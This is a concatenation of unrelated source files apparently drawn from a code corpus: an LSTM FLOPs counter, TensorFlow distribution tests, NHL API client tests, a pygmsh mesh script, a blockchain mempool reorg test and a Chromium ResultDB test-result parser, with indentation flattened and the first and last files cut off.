def _count_lstm_cell(modeltype,input_size,hidden_size,wRank=None,uRank=None,bias=True):
"""count FLOPs of lstm/vmlmf cell
:param modeltype: string modeltype
:param input_size: integer input size of the model
:param hidden_size: integer hidden layer size of the model
:param wRank: input to hidden matrix rank of vmlmf
    :param uRank: hidden to hidden matrix rank of vmlmf
:param bias: whether the model share bias between for gates
:returns: FLOPs of a cell
"""
total_ops=0
isvmmodel = True if modeltype != "mylstm" else False
#vector-vector multiplication
input_dia_ops = input_size
hidden_dia_ops = hidden_size
    # subtract vec elem
if wRank is not None:
input_addition = (2*wRank-1)*input_size + hidden_size
if uRank is not None:
hidden_addition = (2*uRank-1)*hidden_size +hidden_size
input_ops=(2*input_size-1)*wRank+(2*wRank-1)*hidden_size \
if isvmmodel else (2*input_size-1)*hidden_size
hidden_ops=(2*hidden_size-1)*uRank+(2*uRank-1)*hidden_size\
if isvmmodel else (2*hidden_size-1)*hidden_size
state_ops=input_ops+hidden_ops + input_dia_ops + hidden_dia_ops +hidden_size*3 \
+input_addition + hidden_addition if isvmmodel else input_ops + hidden_ops + hidden_size
if bias:
state_ops+=hidden_size
total_ops+=state_ops*4
#hadamard addition (f*c + i*g )
total_ops+=hidden_size*3
#h'=o*tanh(c')
total_ops+=hidden_size
return total_ops
def count_lstm(model,seq_len,batch_size,modeltype):
"""count FLOPs of lstm/vmlmf layer
:param model: model object
:param seq_len: integer sequence length of the input data
:param batch_size: integer batch_size of the input data
:param modeltype: type of the model
:returns: FLOPs of LSTM model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return None
total_ops=0
total_ops+=_count_lstm_cell(modeltype,model.rnn.input_size,\
model.rnn.hidden_layer_sizes[0],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
for i in range(len(model.rnn.hidden_layer_sizes)-1):
total_ops+=_count_lstm_cell(modeltype,model.rnn.hidden_layer_sizes[i],\
model.rnn.hidden_layer_sizes[i+1],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
total_ops*=seq_len
total_ops*=batch_size
return total_ops
def count_linear(model,output_size):
"""count FLOPs of linear layer
:param model: model object
:param output_size: integer output size of the model
:returns: FLOPs of linear layer
"""
input_size=model.rnn.hidden_layer_sizes[-1]
return input_size*output_size*2
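# Hedged worked example (illustration only, not part of the original module): for a
# plain LSTM cell (modeltype "mylstm", so wRank/uRank stay None) the count above
# reduces to 4 gates of (2*I-1)*H + (2*H-1)*H + H (+ H for the bias), plus 3*H for
# f*c + i*g and H for o*tanh(c). The layer sizes below are arbitrary.
def _example_plain_lstm_cell_flops(input_size=128, hidden_size=256):
    return _count_lstm_cell("mylstm", input_size, hidden_size, bias=True)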
|
the-stack_0_6206 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class DirichletMultinomialTest(tf.test.TestCase):
def testSimpleShapes(self):
with self.test_session():
alpha = np.random.rand(3)
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
alpha = np.random.rand(3, 2, 2)
n = [[3., 2], [4, 5], [6, 7]]
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([3, 2]), dist.get_batch_shape())
def testNproperty(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual([1, 1], dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testAlphaProperty(self):
alpha = [[1., 2, 3]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1, alpha)
self.assertEqual([1, 3], dist.alpha.get_shape())
self.assertAllClose(alpha, dist.alpha.eval())
def testPmfNandCountsAgree(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError('Condition x >= 0.*'):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([3., 3, 0]).eval()
def testPmf_non_integer_counts(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
dist.pmf([3.0, 0, 2.0]).eval()
# Both equality and integer checking fail.
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([1.0, 2.5, 1.5]).eval()
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf([1., 2., 3.]).eval()
# Non-integer arguments work.
dist.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [1., 0]
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 3., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [3., 2]
dist = tf.contrib.distributions.DirichletMultinomial(5., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 7., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesMultidimensionalN(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
alpha = [1., 2]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
pmf = dist.pmf(counts)
self.assertAllClose([[1 / 7., 1 / 7., 1 / 7.]] * 4, pmf.eval())
self.assertEqual((4, 3), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenSameRank(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
alpha = [[1., 2]]
counts = [[1., 0], [0., 1]]
dist = tf.contrib.distributions.DirichletMultinomial([1.], alpha)
pmf = dist.pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenLowerRank(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
alpha = [1., 2]
counts = [[1., 0], [0., 1]]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [[1., 0]]
pmf = tf.contrib.distributions.DirichletMultinomial(
[1., 1.], alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
    # The probability of one vote falling into class k is the mean for class k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [1., 0]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfForOneVoteIsTheMeanWithOneRecordInput(self):
    # The probability of one vote falling into class k is the mean for class k.
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts = np.zeros((3), dtype=np.float32)
counts[class_num] = 1
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
mean = dist.mean().eval()
pmf = dist.pmf(counts).eval()
self.assertAllClose(mean[class_num], pmf)
self.assertTupleEqual((3,), mean.shape)
self.assertTupleEqual((), pmf.shape)
def testMeanDoubleTwoVotes(self):
    # The probability of two votes falling into class k for
    # DirichletMultinomial(2, alpha) is twice the probability of one vote
    # falling into class k for DirichletMultinomial(1, alpha).
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts_one = np.zeros((3), dtype=np.float32)
counts_one[class_num] = 1.
counts_two = np.zeros((3), dtype=np.float32)
counts_two[class_num] = 2
dist1 = tf.contrib.distributions.DirichletMultinomial(1., alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(2., alpha)
mean1 = dist1.mean().eval()
mean2 = dist2.mean().eval()
self.assertAllClose(mean2[class_num], 2 * mean1[class_num])
self.assertTupleEqual((3,), mean1.shape)
def testVariance(self):
# Shape [2]
alpha = [1., 2]
ns = [2., 3., 4., 5.]
alpha_0 = np.sum(alpha)
# Diagonal entries are of the form:
# Var(X_i) = n * alpha_i / alpha_sum * (1 - alpha_i / alpha_sum) *
# (alpha_sum + n) / (alpha_sum + 1)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
# Off diagonal entries are of the form:
# Cov(X_i, X_j) = -n * alpha_i * alpha_j / (alpha_sum ** 2) *
# (alpha_sum + n) / (alpha_sum + 1)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [2, 2].
shared_matrix = np.array([
[variance_entry(alpha[0], alpha_0),
covariance_entry(alpha[0], alpha[1], alpha_0)],
[covariance_entry(alpha[1], alpha[0], alpha_0),
variance_entry(alpha[1], alpha_0)]])
with self.test_session():
for n in ns:
# n is shape [] and alpha is shape [2].
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
variance = dist.variance()
expected_variance = n * (n + alpha_0) / (1 + alpha_0) * shared_matrix
self.assertEqual((2, 2), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_n_alpha_broadcast(self):
alpha_v = [1., 2, 3]
alpha_0 = 6.
# Shape [4, 3]
alpha = np.array(4 * [alpha_v], dtype=np.float32)
# Shape [4, 1]
ns = np.array([[2.], [3.], [4.], [5.]], dtype=np.float32)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [4, 3, 3]
shared_matrix = np.array(4 * [[
[variance_entry(alpha_v[0], alpha_0),
covariance_entry(alpha_v[0], alpha_v[1], alpha_0),
covariance_entry(alpha_v[0], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[1], alpha_v[0], alpha_0),
variance_entry(alpha_v[1], alpha_0),
covariance_entry(alpha_v[1], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[2], alpha_v[0], alpha_0),
covariance_entry(alpha_v[2], alpha_v[1], alpha_0),
variance_entry(alpha_v[2], alpha_0)]]], dtype=np.float32)
with self.test_session():
# ns is shape [4, 1], and alpha is shape [4, 3].
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
variance = dist.variance()
expected_variance = np.expand_dims(
ns * (ns + alpha_0) / (1 + alpha_0), -1) * shared_matrix
self.assertEqual((4, 3, 3), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_multidimensional(self):
alpha = np.random.rand(3, 5, 4).astype(np.float32)
alpha2 = np.random.rand(6, 3, 3).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5, 1]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1, 1]).astype(np.float32)
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(ns2, alpha2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testZeroCountsResultsInPmfEqualToOne(self):
# There is only one way for zero items to be selected, and this happens with
# probability 1.
alpha = [5, 0.5]
counts = [0., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(0., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1.0, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testLargeTauGivesPreciseProbabilities(self):
# If tau is large, we are doing coin flips with probability mu.
mu = np.array([0.1, 0.1, 0.8], dtype=np.float32)
tau = np.array([100.], dtype=np.float32)
alpha = tau * mu
# One (three sided) coin flip. Prob[coin 3] = 0.8.
# Note that since it was one flip, value of tau didn't matter.
counts = [0., 0, 1]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8, pmf.eval(), atol=1e-4)
self.assertEqual((), pmf.get_shape())
# Two (three sided) coin flips. Prob[coin 3] = 0.8.
counts = [0., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8**2, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
# Three (three sided) coin flips.
counts = [1., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(3., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(3 * 0.1 * 0.8 * 0.8, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
def testSmallTauPrefersCorrelatedResults(self):
# If tau is small, then correlation between draws is large, so draws that
# are both of the same class are more likely.
mu = np.array([0.5, 0.5], dtype=np.float32)
tau = np.array([0.1], dtype=np.float32)
alpha = tau * mu
# If there is only one draw, it is still a coin flip, even with small tau.
counts = [1., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
# If there are two draws, it is much more likely that they are the same.
counts_same = [2., 0]
counts_different = [1, 1.]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf_same = dist.pmf(counts_same)
pmf_different = dist.pmf(counts_different)
self.assertLess(5 * pmf_different.eval(), pmf_same.eval())
self.assertEqual((), pmf_same.get_shape())
def testNonStrictTurnsOffAllChecks(self):
# Make totally invalid input.
with self.test_session():
alpha = [[-1., 2]] # alpha should be positive.
counts = [[1., 0], [0., -1]] # counts should be non-negative.
n = [-5.3] # n should be a non negative integer equal to counts.sum.
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf(counts).eval() # Should not raise.
if __name__ == '__main__':
tf.test.main()
|
the-stack_0_6207 | from datetime import date
import pytest
from nhlapi.endpoints import NHLAPI
from nhlapi.utils import Season
class MockClient:
def get(self, url, params=None):
self.url = url
self.params = params
def test_teams():
mock = MockClient()
api = NHLAPI(mock)
api.teams(8, expand=["foo", "bar"], stats="single")
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams"
assert mock.params["teamId"] == "8"
assert mock.params["expand"] == "foo,bar"
assert mock.params["stats"] == "single"
def test_teams_stats():
mock = MockClient()
api = NHLAPI(mock)
api.team_stats(8)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams/8/stats"
def test_teams_divisions():
mock = MockClient()
api = NHLAPI(mock)
api.divisions()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions"
def test_teams_divisions_id():
mock = MockClient()
api = NHLAPI(mock)
api.divisions(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions/1"
def test_teams_conferences():
mock = MockClient()
api = NHLAPI(mock)
api.conferences()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences"
def test_teams_conferences_id():
mock = MockClient()
api = NHLAPI(mock)
api.conferences(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences/1"
def test_people_simple():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000"
def test_people_stats():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000, stats="single", stats_season=Season(end=2018))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000/stats"
assert mock.params["stats"] == "single"
assert mock.params["season"] == "20172018"
def test_schedule_date():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(expand=["foo", "bar"], date=date(2018, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["expand"] == "foo,bar"
assert mock.params["date"] == "2018-01-01"
def test_schedule_team_range():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(8, start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["teamId"] == "8"
assert mock.params["startDate"] == "2018-01-01"
assert mock.params["endDate"] == "2018-06-01"
def test_schedule_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.schedule(date=date.today(), start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
def test_standings_season():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", season=Season(2017))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["season"] == "20172018"
def test_standings_date():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", date=date(2017, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["date"] == "2017-01-01"
def test_standings_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.standings(date=date.today(), season=Season(end=2018))
|
the-stack_0_6208 | import pygmsh as pg
from params import height, width, dist_center, inlet_width, inlet_depth, line_sep, ymin1, ymin2
from params import INMOUTH1, INMOUTH2, OUTMOUTH1, OUTMOUTH2, INLET1, INLET2, OUTLET1, OUTLET2, WALLS, DOMAIN
def main():
#geom = pg.built_in.Geometry()
size = 0.02;
geom = pg.opencascade.Geometry(
characteristic_length_min=size, characteristic_length_max=size)
main_rect = geom.add_rectangle([0.0, 0.0, 0.0], width, height)
mouth_inlet1 = geom.add_rectangle([-inlet_depth, ymin1, 0.0], inlet_depth, inlet_width)
mouth_inlet2 = geom.add_rectangle([-inlet_depth, ymin2, 0.0], inlet_depth, inlet_width)
mouth_outlet1 = geom.add_rectangle([width, ymin1, 0.0], inlet_depth, inlet_width)
mouth_outlet2 = geom.add_rectangle([width, ymin2, 0.0], inlet_depth, inlet_width)
print("ymin1 :{}".format(ymin1))
print("ymin2 :{}".format(ymin2))
geom.add_physical(mouth_inlet1, INMOUTH1)
geom.add_physical(mouth_inlet2, INMOUTH2)
geom.add_physical(mouth_outlet1, OUTMOUTH1)
geom.add_physical(mouth_outlet2, OUTMOUTH2)
geom.add_physical([main_rect], DOMAIN)
heat_exchanger = geom.boolean_fragments([main_rect], [mouth_inlet1, mouth_inlet2, mouth_outlet1, mouth_outlet2])
geom.add_raw_code("""vb1[] = Boundary{{Surface{{ {0} }};}};
vb2[] = Boundary{{Surface{{ {1} }};}};
vb3[] = Boundary{{Surface{{ {2} }};}};
vb4[] = Boundary{{Surface{{ {3} }};}};
vb0[] = Boundary{{Surface{{ {4} }};}};"""
.format(mouth_inlet1.id,
mouth_inlet2.id,
mouth_outlet1.id,
mouth_outlet2.id,
main_rect.id
))
geom.add_raw_code("""Physical Curve({0}) = {{vb0[],
vb1[0], vb1[2],
vb2[0], vb2[2],
vb3[0], vb3[2],
vb4[0], vb4[2]}};"""
.format(WALLS)
)
geom.add_raw_code("Physical Curve({0}) -= {{-vb1[1], -vb2[1], -vb3[3], -vb4[3]}};\n \
Physical Curve({1}) = {{vb1[3]}};\n \
Physical Curve({2}) = {{vb3[1]}};\n \
Physical Curve({3}) = {{vb2[3]}};\n \
Physical Curve({4}) = {{vb4[1]}};"
.format(WALLS, INLET1, OUTLET1, INLET2, OUTLET2))
mesh = pg.generate_mesh(geom, geo_filename="2D_mesh.geo")
import meshio
meshio.write("2D_mesh_heat_exchanger.vtk", mesh)
if __name__ == '__main__':
main()
|
the-stack_0_6209 | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import FatbitTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(FatbitTestFramework):
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
        # mempool should now contain all the txns again, all unconfirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
the-stack_0_6214 | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is for processing test results from resultdb"""
import base64
import logging
from collections import defaultdict
from common.findit_http_client import FinditHttpClient
from go.chromium.org.luci.resultdb.proto.v1 import test_result_pb2
from infra_api_clients import http_client_util
from libs.test_results.base_test_results import BaseTestResults
from libs.test_results.classified_test_results import ClassifiedTestResults
from services import resultdb
_FAILURE_STATUSES = [
test_result_pb2.TestStatus.FAIL, test_result_pb2.TestStatus.CRASH,
test_result_pb2.TestStatus.ABORT
]
_FINDIT_HTTP_CLIENT = FinditHttpClient()
class ResultDBTestType(object):
OTHER = 'OTHER'
GTEST = 'GTEST'
BLINK = 'BLINK'
# TODO (crbug/981066): Implement this
# pylint: disable=abstract-method
class ResultDBTestResults(BaseTestResults):
def __init__(self, test_results, partial_result=False):
"""Creates a ResultDBTestResults object from resultdb test results
Arguments:
test_results: Array of luci.resultdb.v1.TestResult object
partial_result: False if the results are from a single shard, True if
the results are from all shards
"""
self.partial_result = partial_result
self.test_results = ResultDBTestResults.group_test_results_by_test_name(
test_results)
def GetFailedTestsInformation(self):
failed_test_log = {}
reliable_failed_tests = {}
for test_name, result in self.test_results.items():
if result["reliable_failure"]:
test_type = result["test_type"]
# TODO(crbug.com/981066): Consider running this in parallel
real_logs = map(
lambda l: ResultDBTestResults.get_detailed_failure_log(
test_type, l), result["failure_logs"])
merged_test_log = '\n'.join(real_logs)
failed_test_log[test_name] = base64.b64encode(merged_test_log)
reliable_failed_tests[test_name] = test_name
return failed_test_log, reliable_failed_tests
@property
def contains_all_tests(self):
"""
True if the test result is merged results for all shards; False if it's a
partial result.
"""
return not self.partial_result
def test_type(self):
for _, result in self.test_results.items():
return result["test_type"]
return ResultDBTestType.OTHER
def GetClassifiedTestResults(self):
"""Parses ResultDB results, counts and classifies test results.
Also counts number of expected and unexpected results for each test.
Returns:
(ClassifiedTestResults) An object with information for each test:
* total_run: total number of runs,
* num_expected_results: total number of runs with expected results,
* num_unexpected_results: total number of runs with unexpected results,
* results: classified test results in 5 groups: passes, failures, skips,
unknowns, notruns.
"""
classified_results = ClassifiedTestResults()
for test_name, test_info in self.test_results.items():
# We don't care about the tests that were skipped on purpose
if (test_info["num_passed"] == 0 and test_info["num_failed"] == 0 and
test_info["num_crashed"] == 0 and test_info["num_aborted"] == 0 and
test_info["num_notrun"] == 0 and test_info["num_unspecified"] == 0):
continue
classified_results[test_name].total_run = test_info["total_run"]
classified_results[test_name].num_expected_results = test_info[
"num_expected_results"]
classified_results[test_name].num_unexpected_results = test_info[
"num_unexpected_results"]
if test_info["num_passed"]:
classified_results[test_name].results.passes['PASS'] = test_info[
"num_passed"]
if test_info["num_failed"]:
classified_results[test_name].results.failures['FAIL'] = test_info[
"num_failed"]
if test_info["num_crashed"]:
classified_results[test_name].results.failures['CRASH'] = test_info[
"num_crashed"]
if test_info["num_aborted"]:
classified_results[test_name].results.failures['ABORT'] = test_info[
"num_aborted"]
if test_info["num_skipped"]:
classified_results[test_name].results.skips['SKIP'] = test_info[
"num_skipped"]
if test_info["num_notrun"]:
classified_results[test_name].results.notruns['SKIP'] = test_info[
"num_notrun"]
if test_info["num_unspecified"]:
classified_results[test_name].results.unknowns[
'UNSPECIFIED'] = test_info["num_unspecified"]
return classified_results
def GetTestLocation(self, test_name):
"""Gets test location for a specific test.
Returns: A tuple containing
* A dictionary of {
"line": line number of the test
"file": file path to the test
}
* A possible error string
"""
location = self.test_results.get(test_name, {}).get('test_location')
if not location:
return None, 'test location not found'
return location, None
def DoesTestExist(self, test_name):
return test_name in self.test_results
def IsTestResultUseful(self):
return len(self.test_results) > 0
@staticmethod
def group_test_results_by_test_name(test_results):
# pylint: disable=line-too-long
"""Returns a dictionary of
{
<test_name>:{
"reliable_failure": whether the test fail consistently
"failure_logs": array of dictionary {
"name": test result name (e.g. invocations/task-chromium-swarm.appspot.com-508dcba4306cae11/tests/ninja:%2F%2Fgpu:gl_tests%2FSharedImageGLBackingProduceDawnTest.Basic/results/c649f775-00777)
"summary_html": summary_html of a run
}
"test_type": type of test
"test_location": location of the test
"total_run": number of runs for the test
"num_expected_results": number of expected runs
"num_unexpected_results": number of unexpected runs
"num_passed": number of passed results
"num_failed": number of failed results
"num_crashed": number of crashed results
"num_aborted": number of aborted results
"num_skipped": number of skipped results
"num_notrun": number of not run results
"num_unspecified": number of unspecified results
}
}
Arguments:
test_results: Array of ResultDB TestResult object
"""
results = defaultdict(dict)
for test_result in test_results:
test_name = ResultDBTestResults.test_name_for_test_result(test_result)
if not test_name:
continue
is_failure = ResultDBTestResults.is_failure(test_result)
log = {
"name":
test_result.name,
"summary_html":
ResultDBTestResults.summary_html_for_test_result(test_result)
}
if not results.get(test_name):
results[test_name] = {
"reliable_failure":
is_failure,
"failure_logs": [log] if is_failure else [],
"test_type":
ResultDBTestResults.test_type_for_test_result(test_result),
"test_location":
ResultDBTestResults.test_location_for_test_result(test_result),
"total_run":
0,
"num_expected_results":
0,
"num_unexpected_results":
0,
"num_passed":
0,
"num_failed":
0,
"num_crashed":
0,
"num_aborted":
0,
"num_skipped":
0,
"num_notrun":
0,
"num_unspecified":
0,
}
else:
results[test_name]["reliable_failure"] = results[test_name][
"reliable_failure"] and is_failure
if is_failure:
results[test_name]["failure_logs"].append(log)
ResultDBTestResults._update_classified_test_results(
results[test_name], test_result)
return results
@staticmethod
def _update_classified_test_results(classified_results, test_result):
"""Update classified_results with a test result object
Arguments:
classified_results: A dictionary containing results for a test ID
test_result: A luci.resultdb.v1.TestResult object
"""
classified_results["total_run"] += 1
if test_result.expected:
classified_results["num_expected_results"] += 1
else:
classified_results["num_unexpected_results"] += 1
if test_result.status == test_result_pb2.TestStatus.PASS:
classified_results["num_passed"] += 1
elif test_result.status == test_result_pb2.TestStatus.FAIL:
classified_results["num_failed"] += 1
elif test_result.status == test_result_pb2.TestStatus.CRASH:
classified_results["num_crashed"] += 1
elif test_result.status == test_result_pb2.TestStatus.ABORT:
classified_results["num_aborted"] += 1
elif test_result.status == test_result_pb2.TestStatus.SKIP:
if test_result.expected:
classified_results["num_skipped"] += 1
else:
classified_results["num_notrun"] += 1
else:
classified_results["num_unspecified"] += 1
@staticmethod
def is_failure(test_result):
return test_result.status in _FAILURE_STATUSES and not test_result.expected
@staticmethod
def test_name_for_test_result(test_result):
"""Returns the test name for luci.resultdb.v1.TestResult object
Arguments:
test_result: A luci.resultdb.v1.TestResult object
"""
for tag in test_result.tags or []:
if tag.key == "test_name":
return tag.value
